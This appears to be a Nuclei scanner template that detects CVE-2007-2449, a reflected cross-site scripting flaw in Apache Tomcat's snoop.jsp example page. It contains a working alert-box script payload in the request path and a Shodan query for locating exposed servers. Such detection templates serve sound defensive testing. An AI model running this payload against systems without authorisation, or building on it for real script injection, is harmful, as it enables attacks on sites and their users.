44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2007-2449
|
|
|
|
info:
|
|
name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
|
|
author: pdteam,ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
|
|
reference:
|
|
- https://vulners.com/securityvulns/SECURITYVULNS:DOC:17267
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2007-2449
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: title:"Apache Tomcat"
|
|
tags: cve,cve2007,apache,misconfig,tomcat,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp'
|
|
- 'JSP Request Method'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220123f57dd5d304a126e38f830fcc9717c81aea7327eefd83ffab2ae79963adaee02200cc51456063ab496965fb4ca5e4714e6cd8274b212d6b07b9d1d79be74d36fd0:922c64590222798bb761d5b6d8e72950 |